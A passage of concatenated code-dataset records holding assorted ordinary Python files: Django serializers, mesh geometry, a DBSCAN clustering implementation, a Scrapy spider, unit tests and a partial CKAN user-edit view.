print(\"\\n\")","repo_name":"maxkashyap41/pythonDSA","sub_path":"String/removingPairCharacters.py","file_name":"removingPairCharacters.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15305705846","text":"from rest_framework import serializers\nfrom ECG.models import Report, Patient, Doctor\nfrom drf_extra_fields.relations import PresentablePrimaryKeyRelatedField\n\n\nclass DoctorSerializer(serializers.ModelSerializer):\n class Meta:\n model =Doctor\n fields = '__all__'\n\nclass PatientSerializer(serializers.ModelSerializer):\n Doctor = PresentablePrimaryKeyRelatedField(\n queryset=Doctor.objects.all(),\n presentation_serializer=DoctorSerializer,\n read_source=None,\n required = False\n )\n\n class Meta:\n model = Patient\n fields = '__all__'\n\nclass ReportSerializer(serializers.ModelSerializer):\n Patient = PresentablePrimaryKeyRelatedField(\n queryset=Patient.objects.all(),\n presentation_serializer=PatientSerializer,\n read_source=None,\n required = False\n )\n\n class Meta:\n model = Report\n fields = '__all__'\n\n","repo_name":"mahdishirvani79/ECG","sub_path":"ECG_backend/ECG/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3221346327","text":"'''\ncode to use voxelized GVDs to compute closest point on a mesh to query points\n'''\nimport numpy as np\n\nfrom numba import njit\n\nfrom point2mesh.util.ArrayTricks import threeD_multi_to_1D\n\nfrom point2mesh import triangle_mesh\n\n@njit\ndef point2mesh_closest_cpu(query_point,triangles,voxels2triangles,candidate_triangles,minimums,spacing,domain_width,tol):\n '''\n compute the closest point on a set of triangles to a query point\n\n Parameters: query_point : (3,) float array\n the query point, must be within the domain the voxelization was constructed for\n triangles : (ntri*9,) float array\n the triangle array, flattened\n voxels2triangles : (n_voxel,) integer array\n each entry stores the first index in candidate_triangles that corresponds to that voxel\n candidate_triangles : (max(voxels2triangles)+1,) integer array\n array of triangle indices. This is the concatenation of the arrays of triangles that correspond to each voxel\n minimums : (3,) float array\n the minimum x-y-z position inside the voxelization\n spacing : float\n the edge length of the voxels\n domain_width : (3,) int array\n the number of voxels in each dimension\n tol : float\n the tolerance to use for point to triangle calculations\n Returns: closest_point : (3,) float array\n the coordinates of the closest point on a triangle to query_point. NaNs if query_point is outside the voxelization\n squared_distance : float\n the squared distance from the closest_point to the query_point\n count : int\n the number of triangles closest point was computed for\n '''\n int_idx=((query_point-minimums)//spacing).astype(np.int64)\n closest_point=np.array([np.nan,np.nan,np.nan])\n if np.any(int_idx>=domain_width) or np.any(int_idx<0):\n return closest_point,np.inf,0\n else:\n array_pos=threeD_multi_to_1D(int_idx[0],int_idx[1],int_idx[2],domain_width)\n triangle_id_start=voxels2triangles[array_pos]\n triangle_id_end=voxels2triangles[array_pos+1]\n triangle_ids=candidate_triangles[triangle_id_start:triangle_id_end]\n mindistsquared=np.inf\n for triangle_id in triangle_ids:\n idx=triangle_id*9\n cx,cy,cz=triangle_mesh.cuda_closest_point_on_triangle(triangles[idx:idx+9],query_point,tol)\n ex=query_point[0]-cx\n ey=query_point[1]-cy\n ez=query_point[2]-cz\n candidate_dist_squared=ex*ex+ey*ey+ez*ez\n if candidate_dist_squared<mindistsquared:\n mindistsquared=candidate_dist_squared\n closest_point[0]=cx\n closest_point[1]=cy\n closest_point[2]=cz\n return closest_point,mindistsquared,len(triangle_ids)\n\n@njit\ndef closest_point_on_mesh_via_cpu_serial(points,triangles,voxels2triangles,candidate_triangles,minimums,spacing,domain_width):\n '''\n compute the closest point on a set of triangles to query points\n\n Parameters: points : (npts,3) float array\n the query points, must be within the domain the voxelization was constructed for (returns nans for closest point if this fails)\n triangles : (ntri*9,) float array\n the triangle array, flattened\n voxels2triangles : (n_voxel,) integer array\n each entry stores the first index in candidate_triangles that corresponds to that voxel\n candidate_triangles : (max(voxels2triangles)+1,) integer array\n array of triangle indices. This is the concatenation of the arrays of triangles that correspond to each voxel\n minimums : (3,) float array\n the minimum x-y-z position inside the voxelization\n spacing : float\n the edge length of the voxels\n domain_width : (3,) int array\n the number of voxels in each dimension\n tol : float\n the tolerance to use for point to triangle calculations\n Returns: closest_point : (npts,3) float array\n the coordinates of the closest point on a triangle to query_point. row is NaNs if query_point is outside the voxelization\n squared_distances : (npts,) float array\n the squared distance from the closest_point to the query_point\n count : (npts,) int array\n the number of triangles closest point was computed for\n '''\n closest_points=np.empty_like(points)\n squared_distances=np.empty(len(points))\n counts=np.empty(len(points),dtype=np.int64)\n tol=1e-12\n for i,point in enumerate(points):\n closest_points[i],squared_distances[i],counts[i]=point2mesh_closest_cpu(point,triangles,voxels2triangles,candidate_triangles,minimums,spacing,domain_width,tol)\n return closest_points,squared_distances,counts","repo_name":"biorobotics/point2mesh-prune","sub_path":"point2mesh/voxelized/closest.py","file_name":"closest.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25616298313","text":"try:\r\n X = eval(input(\"請輸入被除數X:\"))\r\n Y = eval(input(\"請輸入除數Y:\"))\r\n Z = X / Y\r\nexcept ZeroDivisionError:\r\n print(\"除數不得為0\")\r\nexcept Exception as e1:\r\n print(e1.args)\r\nelse:\r\n print(\"沒有捕捉到例外!X除以Y的結果等於\", Z)\r\nfinally:\r\n print(\"離開try…except區塊\")\r\n","repo_name":"MyDearGreatTeacher/python2022","sub_path":"教科書/Ch08/except2.py","file_name":"except2.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"2398698595","text":"import socket\n\ntry:\n from app.modules.logger import create_log\n from app.modules.config import *\nexcept ImportError:\n from modules.logger import create_log\n from modules.config import *\n\nHOST, PORT = raspi_ip, raspi_socket_port_on_off\n\ntry:\n logger = create_log(webserver_logger)\nexcept:\n logger = create_log(raspi_logger)\n\n\ndef relay_on_off(state: str):\n data = state.encode()\n\n # Create a socket (SOCK_STREAM means a TCP socket)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n # Connect to server and send data\n sock.connect((HOST, PORT))\n sock.sendall(bytes(data))\n except OSError as err:\n logger.error(err)\n finally:\n sock.close()\n","repo_name":"kave06/tfg","sub_path":"app/model/webserver_client_socket_on_off.py","file_name":"webserver_client_socket_on_off.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24624627157","text":"# Resolução pergunta 2:\n\nnum = int(input('Insira um número: '))\n\ndef fib(n):\n if n > 1:\n return fib(n-1) + fib(n-2)\n return n\n\nfor i in range(num):\n print(fib(i))","repo_name":"MuriloMaranzati/Target","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17977978789","text":"\ndef variable_splitter(df):\n\n '''This function takes in a dataframe, and outputs several X and Y variable subsets for the Flaredown Capstone project. Those Variable Lists include:\n \n o y = The DV (target)\n o Several IV (X) subsets: \n o All Variables\n o Basic Variables (age, gender (female, other), total logs, total unique date days, total log rate, conditions total, symptoms toal and fibro comorbidities)\n o Symptom / Condition Binaries\n o Symptom / Condition Total Logs\n o Symptom / Condition Activity\n o Symptom / Condition Log Rate\n '''\n import pandas as pd\n\n # making sure getting a dataframe\n assert isinstance(df, pd.DataFrame), f\"Please enter a dataframe, you entered a {type(df)} data type\"\n\n df = df.drop(columns=['gender', 'country', 'male'])\n\n # extracting the target\n y = df['target']\n\n #Creating the X variables\n\n # all\n X_all = df.copy()\n X_all.drop(columns='target', inplace=True)\n\n # Basic\n X_basic = df[['ids','age', 'female', 'other', 'total_logs',\n 'total_unique_dates_days', 'total_log_rate', 'conditions_total', 'symptoms_total',\n 'fibro_comorbidities']]\n \n all_cols = list(X_all.columns)\n columns_new = list()\n X_basic_list = list(X_basic.columns)\n\n for col in all_cols:\n if col not in X_basic_list:\n columns_new.append(col)\n\n # creating the other X variables: binary, total logs, activity, log rate, and unique dates\n X_CS_binaries_list = list()\n X_CS_total_logs_list = list()\n X_CS_activity_list = list()\n X_CS_log_rate_list = list()\n X_CS_unique_dates_list = list()\n\n print(\"Total Condition / Symptom Binary length\", len(X_CS_binaries_list))\n print(\"Total logs length:\", len(X_CS_total_logs_list))\n print(\"Median activity length:\",len(X_CS_activity_list))\n print(\"Log rate length:\",len(X_CS_log_rate_list))\n print(\"Unique dates length:\",len(X_CS_unique_dates_list))\n\n for col in columns_new:\n if \"_activity\" in col:\n X_CS_activity_list.append(col)\n elif '_total_logs' in col:\n X_CS_total_logs_list.append(col)\n elif \"_log_rate\" in col:\n X_CS_log_rate_list.append(col)\n elif \"_unique_dates_days\" in col:\n X_CS_unique_dates_list.append(col)\n\n # adding the basic variables into each list\n X_CS_binaries_list = X_basic_list + X_CS_binaries_list \n X_CS_total_logs_list = X_basic_list + X_CS_total_logs_list\n X_CS_activity_list = X_basic_list + X_CS_activity_list\n X_CS_log_rate_list = X_basic_list + X_CS_log_rate_list\n X_CS_unique_dates_list = X_basic_list + X_CS_unique_dates_list\n\n # creating condition and symptom binaries\n to_remove = X_CS_total_logs_list + X_CS_activity_list + X_CS_log_rate_list + X_CS_unique_dates_list\n\n for col in all_cols:\n if col not in to_remove:\n X_CS_binaries_list.append(col)\n\n print(\"Total Condition / Symptom Binary length\", len(X_CS_binaries_list))\n print(\"Total logs length:\", len(X_CS_total_logs_list))\n print(\"Median activity length:\",len(X_CS_activity_list))\n print(\"Log rate length:\",len(X_CS_log_rate_list))\n print(\"Unique dates length:\",len(X_CS_unique_dates_list))\n\n # Creating X variables\n\n X_CS_binary = df[X_CS_binaries_list]\n X_CS_total_logs = df[X_CS_total_logs_list]\n X_CS_activity = df[X_CS_activity_list]\n X_CS_log_rate = df[X_CS_log_rate_list]\n X_CS_unique_dates = df[X_CS_unique_dates_list]\n\n # returning them\n\n return y, X_all, X_basic, X_CS_binary, X_CS_total_logs, X_CS_activity, X_CS_log_rate, X_CS_unique_dates\n","repo_name":"Saz2049/Flaredown-App","sub_path":"scripts/variable_splitter.py","file_name":"variable_splitter.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26481940307","text":"#!/usr/bin/env python3\nimport argparse\nimport os\n\nfrom unittest import TestCase\n\nfrom cm_boy.CmAlgo import CmAlgo\nfrom tests.test_data.TestDataProvider import TestDataProvider\n\n\nclass test_CmAlgo(TestCase):\n\n def setUp(self):\n self.config = TestDataProvider().provide_config()\n self.test_listing = TestDataProvider().provide_listing_id_27()\n self.test_card = TestDataProvider().provide_example_card_id_27()\n self.parser = argparse.ArgumentParser(description='This Boy handles all the cardmarket stuff, good boy!')\n self.setup_parser()\n args = self.parser.parse_args([\"-d\", \"-q\"])\n args.outFile = None\n self.uut = CmAlgo(self.config, args)\n\n def test_card_in_range(self):\n result = self.uut.is_position_in_range(self.test_card, self.test_listing, 50, os.environ[\"cm_user_name\"])\n self.assertTrue(result)\n\n def test_card_already_min(self):\n result = self.uut.is_price_of_card_already_min(self.test_card)\n self.assertFalse(result)\n\n def test_patch_price_of_target_offer(self):\n result = self.uut.match_price_of_target_offer(self.test_card, self.test_listing)\n self.assertTrue(result)\n self.assertEqual(self.test_card[\"price\"], 0.04)\n\n def setup_parser(self):\n self.parser.add_argument(\"-d\", \"--dryrun\", action=\"store_true\", help=\"Do NOT upload the cards with adjusted prices.\")\n self.parser.add_argument(\"-q\", \"--quiet\", action=\"store_true\", help=\"Disable all output to the command line.\")\n self.parser.add_argument(\"-f\", \"--forcePriceSet\", action=\"store_true\", help=\"Regardless of the current position, update the prices.\")\n self.parser.add_argument(\"-o\", \"--outFile\", action=\"store_true\", help=\"Regardless of the current position, update the prices.\")\n","repo_name":"SoftPofi/cm-boy","sub_path":"tests/test_CmAlgo.py","file_name":"test_CmAlgo.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"30939496312","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy import Request\nimport json\n\n\nclass ImagesSpider(scrapy.Spider):\n BASE_URL = 'https://image.so.com/zj?ch=art&sn=%s&listtype=new&temp=1'\n start_index = 0\n\n # 限制最大下载数量,防止磁盘用量过大\n MAX_DOWNLOAD_NUM = 1000\n\n name = \"images\"\n allowed_domains = [\"image.so.com\"]\n start_urls = [BASE_URL % 0]\n\n def parse(self, response):\n # 使用 json 模块解析响应结果\n infos = json.loads(response.body.decode('utf8'))\n # 提取所有图片下载 url 到一个列表,赋给 item 的'image_urls'字段\n yield {'image_urls': [info['qhimg_url'] for info in infos['list']]}\n\n # 如 count 字段大于0,并且下载数量不足 MAX_DOWNLOAD_NUM,继续获取下一页图片信息\n self.start_index += infos['count']\n if infos['count'] > 0 and self.start_index < self.MAX_DOWNLOAD_NUM:\n yield Request(self.BASE_URL % self.start_index)","repo_name":"Rockyzsu/ScrapyBook","sub_path":"so_image/so_image/spiders/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"44564475385","text":"from sys import exit\nfrom textwrap import dedent\n\ndef imprimir_resultado():\n print(\"Se eligió la opción \", valor3, \" y el resultado es: \", r)\n\nvalor1 = int(input(\"Ingrese primer numero: \"))\nvalor2 = int(input(\"Ingrese segundo numero: \"))\nr = 0\n##\nvalor_random = \"borrar\"\n##\n##\nprint(dedent(\"\"\"\n Ingrese 1 si desea sumar los dos valores.\n Ingrese 2 si desea restar al 1er valor el 2do numero.\n Ingrese 3 si desea multiplicar el 1er valor por 2do numero.\n Ingrese 4 si desea interrumpir este programa.\n \"\"\"))\n\nvalor3 = int(input(\"Ingrese respuesta: \"))\n\nif valor3 not in range(1,5): \n exit\n \nelse: \n\n if valor3 == 1:\n r = valor1 + valor2\n imprimir_resultado()\n \n elif valor3 == 2:\n r = valor1 - valor2\n imprimir_resultado()\n \n elif valor3 == 3:\n r = valor1 * valor2\n imprimir_resultado()\n \n elif valor3 == 4:\n print(\"Opción incorrecta.\")\n \n \n","repo_name":"simonvaru/ejercicios-de-clase-4","sub_path":"desafio3_1+.py","file_name":"desafio3_1+.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32089102842","text":"from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db import models, transaction\n\nfrom .api import Reddit\n\n\nclass PostsManager(models.Manager):\n\n @staticmethod\n def create_all(posts):\n\n before_count = Posts.objects.count()\n failed_count = 0\n\n for o in posts:\n with transaction.atomic():\n try:\n Posts.objects.create(\n id=o.id,\n author=o.author,\n title=o.title,\n media=o.media,\n preview=o.preview.get('images')[0] if hasattr(o, 'preview') else None,\n flair=o.link_flair_text,\n is_self=o.is_self,\n over_18=o.over_18,\n subreddit=o.subreddit,\n score=o.score,\n created=o.created,\n created_utc=o.created_utc,\n url=o.url,\n thumbnail=o.thumbnail,\n permalink=Reddit().api + o.permalink\n )\n except:\n failed_count = failed_count + 1\n\n after_count = Posts.objects.count()\n created_count = after_count - before_count\n\n return created_count, failed_count\n\n def pagination(self, page=1, limit=25, newest=True, **filters):\n posts = Posts.objects.filter(**filters).order_by('-created_utc' if newest else 'created_utc')\n paginator = Paginator(posts, limit)\n\n try:\n data = paginator.page(page)\n except PageNotAnInteger:\n data = paginator.page(1)\n except EmptyPage:\n data = paginator.page(paginator.num_pages)\n\n # return data, paginator\n return data, paginator\n\n\nclass Posts(models.Model):\n id = models.CharField(max_length=50, primary_key=True)\n author = models.CharField(max_length=100)\n title = models.TextField(unique=True)\n media = models.TextField(null=True, blank=True)\n preview = models.TextField(null=True, blank=True)\n flair = models.CharField(max_length=100, null=True, blank=True)\n is_self = models.BooleanField()\n over_18 = models.BooleanField()\n subreddit = models.CharField(max_length=255)\n score = models.PositiveIntegerField(default=0)\n created = models.CharField(max_length=100)\n created_utc = models.CharField(max_length=100, default='-')\n url = models.URLField()\n permalink = models.URLField()\n thumbnail = models.URLField()\n\n objects = PostsManager()\n","repo_name":"calinvladth/history","sub_path":"2020/3_good_news/server/posts/reddit/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69991912487","text":"import numpy as np\nfrom dataclasses import dataclass\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\n\n# Assumptions:\n# label = 0 -> undefined\n# label = -1 -> noise\n\n@dataclass\nclass Point:\n location: np.array\n label: int\n\ndef evaluate(labels, labels_true, X, visualize):\n # Number of clusters in labels, ignoring noise if present.\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n n_noise_ = list(labels).count(-1)\n\n print(\"Estimated number of clusters: %d\" % n_clusters_)\n print(\"Estimated number of noise points: %d\" % n_noise_)\n print(\"Homogeneity: %0.3f\" % metrics.homogeneity_score(labels_true, labels))\n print(\"Completeness: %0.3f\" % metrics.completeness_score(labels_true, labels))\n print(\"V-measure: %0.3f\" % metrics.v_measure_score(labels_true, labels))\n print(\"Adjusted Rand Index: %0.3f\" % metrics.adjusted_rand_score(labels_true, labels))\n print(\n \"Adjusted Mutual Information: %0.3f\"\n % metrics.adjusted_mutual_info_score(labels_true, labels)\n )\n print(\"Silhouette Coefficient: %0.3f\" % metrics.silhouette_score(X, labels))\n\n if visualize:\n unique_labels = np.unique(labels)\n for ul in unique_labels:\n plt.plot(X[labels==ul,0],X[labels==ul,1],'.')\n\ndef numpyToPoints(X):\n Points = []\n for i in range(len(X)):\n Points.append(Point(X[i], 0))\n return Points\n\nclass DBSCAN:\n def __init__(self, eps, minPts) -> None:\n self.eps = eps\n self.minPts = minPts\n self.distFunc = self.euclideanDist\n self.labels = []\n\n def RangeQuery(self, Points, p):\n inRange = []\n for point in Points:\n if self.distFunc(p, point) < self.eps:\n inRange.append(point)\n return inRange\n\n def euclideanDist(self, p1:Point, p2:Point):\n return np.sqrt(np.sum(np.power(p1.location-p2.location,2)))#np.sqrt((p1.x - p2.x)**2 + (p1.y - p2.y)**2)\n\n def fit(self, Points):\n C = 0\n for i, p in enumerate(Points):\n if p.label != 0:\n continue\n neighbors = self.RangeQuery(Points, p)\n if len(neighbors) < self.minPts:\n p.label = -1\n continue\n C += 1\n p.label = C\n for n in neighbors:\n if n.label == -1:\n n.label = C\n if n.label != 0:\n continue\n n.label = C\n newNeighbors = self.RangeQuery(Points, n)\n if len(newNeighbors) > self.minPts:\n neighbors.extend(newNeighbors)\n for _, p in enumerate(Points):\n self.labels.append(p.label)\n\ndef HDBSCAN(X, threshold):\n xydists = np.array([np.array([x for _ in range(len(X))]) - X for x in X])\n dists = np.sqrt(xydists[:,:,0]**2 + xydists[:,:,1]**2)\n Npoints = len(dists)\n max_dist = np.max(dists)\n dists[np.triu_indices(Npoints)] = max_dist\n\n mindist = [0]\n mindistPts = []\n\n plt.plot(X[:,0],X[:,1],'o')\n\n i = 0\n while mindist[-1] < threshold and i<dists.size:\n minidx = np.argmin(dists)\n row = minidx // Npoints\n col = minidx % Npoints\n mindist.append(dists[row,col])\n mindistPts.append([row, col])\n dists[row,col] = max_dist\n plt.plot(X[row,0],X[row,1],'or')\n plt.plot(X[col,0],X[col,1],'or')\n plt.plot([X[row,0],X[col,0]],[X[row,1],X[col,1]], 'b')\n i += 1\n plt.show()","repo_name":"jsobolew/MED22ZDBSCAN","sub_path":"DBSCAN.py","file_name":"DBSCAN.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19875652802","text":"from unittest.mock import Mock\nimport os\nfrom pathlib import Path\n\nimport pytest\nfrom torchvision.io import write_png\nimport torch\nfrom requests import Response\n\nfrom product_classifier.config import ConfigModel\nfrom product_classifier.dataset.dataset import AmazonDataset\nfrom product_classifier.dataset.product import AmazonProduct, Image\n\n\n@pytest.fixture\ndef generate_amazon_product_strings():\n def _generate_amazon_product_strings(num_products: int):\n product_strings = []\n for idx in range(num_products):\n product_string = f'{{\\'asin\\': \\'asin_{idx}\\', \\'imUrl\\': \\'imUrl_{idx}.png\\', \\'categories\\': [[\\'category_{idx}\\']], \\'title\\': \\'title_{idx}\\'}}'\n product_strings.append(product_string)\n return product_strings\n return _generate_amazon_product_strings\n\n\n@pytest.fixture\ndef generate_amazon_dataset(tmp_path, generate_amazon_product_strings):\n def _generate_amazon_dataset(num_products: int):\n products = []\n for product_string in generate_amazon_product_strings(num_products):\n products.append(AmazonProduct.parse_product(product_string))\n dataset = AmazonDataset(str(tmp_path))\n dataset.products = products\n return dataset\n return _generate_amazon_dataset\n\n\n@pytest.fixture\ndef generate_amazon_dataset_file(tmp_path, generate_amazon_product_strings):\n def _generate_amazon_dataset_file(number_of_products: int):\n dataset_dir = tmp_path / \"amazon_dataset\"\n dataset_dir.mkdir()\n file_name = \"test_dataset.json\"\n file_path = dataset_dir / file_name\n product_strings = generate_amazon_product_strings(number_of_products)\n file_path.write_text('\\n'.join(product_strings))\n\n return dataset_dir, file_name\n return _generate_amazon_dataset_file\n\n\n@pytest.fixture\ndef mock_image_response():\n mock_response = Response()\n mock_response.status_code = 200\n mock_response._content = b'a test image encoded as bytes'\n mock_response.headers = {'Content-Type': 'image/png'}\n return mock_response\n\n\n@pytest.fixture\ndef mock_requests_get(mock_image_response, monkeypatch):\n mock_requests_get = Mock(return_value=mock_image_response)\n monkeypatch.setattr('product_classifier.dataset.dataset.requests.get', mock_requests_get)\n return mock_requests_get\n\n\n@pytest.fixture()\ndef example_product():\n product_dict = {\n 'asin': 'asin_0',\n 'title': 'title_0',\n 'image': Image(url='imUrl_0.png', filepath='imUrl_0.png'),\n 'categories': [['category_0']]\n }\n product = AmazonProduct(**product_dict)\n return product\n\n\n@pytest.fixture()\ndef example_dataset_dir(tmp_path) -> Path:\n dataset_dir = tmp_path / \"amazon_dataset\"\n dataset_dir.mkdir()\n return dataset_dir\n\n\n@pytest.fixture()\ndef example_product_image_path(example_dataset_dir, example_product) -> Path:\n images_dir = example_dataset_dir / \"images\"\n images_dir.mkdir()\n file_name = example_product.id + '.png'\n image_path = images_dir / file_name\n return image_path\n\n\ndef test_len_returns_number_of_products():\n num_products = 4\n products = [\n AmazonProduct(\n asin='',\n title='',\n image=Image(url='', filepath=''),\n categories=[['Movies & TV', 'Movies', 'Horror']]\n )\n for i in range(num_products)\n ]\n\n amazon_dataset = AmazonDataset(dataset_dir='')\n amazon_dataset.products = products\n\n assert len(amazon_dataset) == num_products\n\n\ndef test_getitem(example_product, example_dataset_dir, example_product_image_path):\n start_image = torch.zeros(3, 400, 600, dtype=torch.uint8)\n write_png(start_image, str(example_product_image_path))\n an_amazon_dataset = AmazonDataset(str(example_dataset_dir))\n\n random_vector = torch.rand(ConfigModel.word_embedding_vector_length)\n embeddings_dict = {'title_0': random_vector}\n an_amazon_dataset.set_word_embedding(embeddings_dict)\n\n example_product.image = Image(url='', file_path=str(example_product_image_path))\n an_amazon_dataset.products = [example_product]\n an_amazon_dataset.set_category_to_idx()\n\n (image, title_vector), category = an_amazon_dataset[0]\n\n assert isinstance(image, torch.Tensor)\n assert isinstance(title_vector, torch.Tensor)\n assert torch.equal(title_vector, random_vector)\n assert category == an_amazon_dataset.category_to_idx[example_product.category]\n\n\ndef test_load_reads_file_and_can_parse_a_product(generate_amazon_dataset_file):\n number_of_products = 1\n dataset_dir, file_name = generate_amazon_dataset_file(number_of_products)\n amazon_dataset = AmazonDataset(str(dataset_dir))\n\n amazon_dataset.load(file_name=file_name, max_products=number_of_products)\n\n assert len(amazon_dataset.products) == number_of_products\n assert amazon_dataset.products[0].dict() == {\n 'id': 'asin_0',\n 'title': 'title_0',\n 'image': {\n 'url': 'imUrl_0.png',\n 'file_path': None\n },\n 'category': 'category_0',\n }\n\n\ndef test_load_parses_specified_number_of_products(generate_amazon_dataset_file):\n number_of_products_in_file = 12\n max_number_of_products_to_load = 10\n dataset_dir, file_name = generate_amazon_dataset_file(number_of_products_in_file)\n amazon_dataset = AmazonDataset(str(dataset_dir))\n\n amazon_dataset.load(file_name=file_name, max_products=max_number_of_products_to_load)\n\n assert len(amazon_dataset.products) == max_number_of_products_to_load\n\n\ndef test_load_parses_all_products_in_file_if_max_products_greater(generate_amazon_dataset_file):\n \"\"\"In case where number_of_products_in_file < max_number_of_products, we want to load all\n products in the file.\"\"\"\n number_of_products_in_file = 6\n max_number_of_products_to_load = 10\n dataset_dir, file_name = generate_amazon_dataset_file(number_of_products_in_file)\n amazon_dataset = AmazonDataset(str(dataset_dir))\n\n amazon_dataset.load(file_name=file_name, max_products=max_number_of_products_to_load)\n\n assert len(amazon_dataset.products) == number_of_products_in_file\n\n\ndef test_download_product_images_downloads_image_and_saves(mock_requests_get, example_product, example_dataset_dir,\n example_product_image_path):\n an_amazon_dataset = AmazonDataset(str(example_dataset_dir))\n an_amazon_dataset.products = [example_product]\n\n an_amazon_dataset.download_product_images()\n\n assert os.path.exists(example_product_image_path)\n mock_requests_get.assert_called_with(url=example_product.image.url, allow_redirects=True)\n\n\ndef test_download_product_images_skips_download_if_file_exists_already(mock_requests_get, example_product,\n example_dataset_dir, example_product_image_path,\n tmp_path):\n expected_file_content = 'a png image to not be overwritten'\n example_product_image_path.write_text(expected_file_content)\n an_amazon_dataset = AmazonDataset(str(example_dataset_dir))\n an_amazon_dataset.products = [example_product]\n\n an_amazon_dataset.download_product_images()\n\n assert example_product_image_path.read_text() == expected_file_content\n\n\ndef test_download_product_images_redownloads_image_if_forced(mock_requests_get, mock_image_response, example_product,\n example_dataset_dir, example_product_image_path, tmp_path):\n original_file_content = 'original file content'\n example_product_image_path.write_text(original_file_content)\n an_amazon_dataset = AmazonDataset(str(example_dataset_dir))\n an_amazon_dataset.products = [example_product]\n\n an_amazon_dataset.download_product_images(force_download=True)\n\n assert example_product_image_path.read_text() != original_file_content\n assert example_product_image_path.read_text() == mock_image_response.text\n\n\ndef test_set_class_name_to_idx(generate_amazon_dataset):\n num_products = 3\n dataset = generate_amazon_dataset(num_products)\n\n dataset.set_category_to_idx()\n\n assert dataset.category_to_idx == {\n 'category_0': 0,\n 'category_1': 1,\n 'category_2': 2\n }\n","repo_name":"SBcharles/Product-Classifier","sub_path":"tests/test_product_classifier/test_dataset/test_dataset.py","file_name":"test_dataset.py","file_ext":"py","file_size_in_byte":8283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73642538408","text":"# encoding: utf-8\nimport logging\n\nfrom flask import Blueprint\nfrom flask.views import MethodView\nfrom ckan.common import asbool\n\nimport ckan.lib.authenticator as authenticator\nimport ckan.lib.base as base\nimport ckan.lib.helpers as h\nimport ckan.lib.navl.dictization_functions as dictization_functions\nimport ckan.logic as logic\nimport ckan.logic.schema as schema\nimport ckan.model as model\nfrom ckan import authz\nfrom ckan.common import _, config, g, request\n\nlog = logging.getLogger(__name__)\n\n# hooks for subclasses\nedit_user_form = u'user/edit_user_form.html'\n\nuser = Blueprint(u'user_edit', __name__, url_prefix=u'/user_edit')\n\n\ndef set_repoze_user(user_id, resp):\n u'''Set the repoze.who cookie to match a given user_id'''\n if u'repoze.who.plugins' in request.environ:\n rememberer = request.environ[u'repoze.who.plugins'][u'friendlyform']\n identity = {u'repoze.who.userid': user_id}\n resp.headers.extend(rememberer.remember(request.environ, identity))\n\n\ndef _edit_form_to_db_schema():\n return schema.user_edit_form_schema()\n\n\ndef _extra_template_variables(context, data_dict):\n is_sysadmin = authz.is_sysadmin(g.user)\n try:\n user_dict = logic.get_action(u'user_show')(context, data_dict)\n except logic.NotFound:\n base.abort(404, _(u'User not found'))\n except logic.NotAuthorized:\n base.abort(403, _(u'Not authorized to see this page'))\n\n is_myself = user_dict[u'name'] == g.user\n about_formatted = h.render_markdown(user_dict[u'about'])\n extra = {\n u'is_sysadmin': is_sysadmin,\n u'user_dict': user_dict,\n u'is_myself': is_myself,\n u'about_formatted': about_formatted\n }\n return extra\n\n\nclass EditView(MethodView):\n def _prepare(self, id):\n context = {\n u'save': u'save' in request.form,\n u'schema': _edit_form_to_db_schema(),\n u'model': model,\n u'session': model.Session,\n u'user': g.user,\n u'auth_user_obj': g.userobj\n }\n if id is None:\n if g.userobj:\n id = g.userobj.id\n else:\n base.abort(400, _(u'No user specified'))\n data_dict = {u'id': id}\n\n try:\n logic.check_access(u'user_update', context, data_dict)\n except logic.NotAuthorized:\n base.abort(403, _(u'Unauthorized to edit a user.'))\n return context, id\n\n def post(self, id=None):\n context, id = self._prepare(id)\n if not context[u'save']:\n return self.get(id)\n\n if id in (g.userobj.id, g.userobj.name):\n current_user = True\n else:\n current_user = False\n old_username = g.userobj.name\n\n try:\n data_dict = logic.clean_dict(\n dictization_functions.unflatten(\n logic.tuplize_dict(logic.parse_params(request.form))))\n data_dict.update(logic.clean_dict(\n dictization_functions.unflatten(\n logic.tuplize_dict(logic.parse_params(request.files))))\n )\n\n except dictization_functions.DataError:\n base.abort(400, _(u'Integrity Error'))\n data_dict.setdefault(u'activity_streams_email_notifications', False)\n\n context[u'message'] = data_dict.get(u'log_message', u'')\n data_dict[u'id'] = id\n\n try:\n user = logic.get_action(u'user_update')(context, data_dict)\n except logic.NotAuthorized:\n base.abort(403, _(u'Unauthorized to edit user 